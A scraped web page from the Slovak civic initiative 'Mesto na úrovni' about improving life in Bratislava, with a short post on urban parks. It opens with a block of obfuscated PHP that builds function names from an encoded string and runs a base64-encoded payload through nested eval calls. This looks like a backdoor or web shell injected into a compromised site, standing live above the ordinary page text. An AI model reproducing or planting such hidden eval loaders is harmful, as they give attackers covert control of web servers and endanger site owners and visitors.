$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iT05FWVRXbWdjb1FTcGtac1hSdmF4cnFJRlViS2pDTUd1bEJoZFBETHR5aXdWZWZKQW5IelBWalVkaEJydUx0SmxIZW9DYUtER0VRd2tPc1htV2dSY1lUeXBTdmZpYk5aTUZxbkF6eElTdjlaRHhBcnZ0TD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Mesto na úrovni | iniciatíva za lepšiu Bratislavu
Ako by mohla vyzerať Bratislava?

Spolu za lepším mestom

Ako spoluzakladatelia Blumentálskej partie sa podieľame na zlepšení verejného života najmä v štvrti Blumentál. Hľadáme riešenia a tvoríme nápady pre zlepšenie kvality života v našom meste.

Naša iniciatíva v meste

Aktuality

Inšpirácie

Parky – pľúca veľkomiest

Zelené plochy sú dôležitým prvkom mestskej infraštruktúry a jedným z neodmysliteľných častí verejných priestranstiev. Vytvárajú protiváhu zastavaným priestorom a kompenzujú nedostatok prírody v mestách. Pôvod mestských…
Janka
16. decembra 2019

Občianske združenie Mesto na úrovni

Mesto na úrovni je iniciatíva rovnomenného občianskeho združenia, za ktorým stoja architekti, urbanisti a developeri so záujmom o Bratislavu. Cieľom združenia je kvalitne pripravenými zásahmi zvýšiť kvalitu života v Bratislave a urobiť z nej mesto na skutočne vysokej úrovni.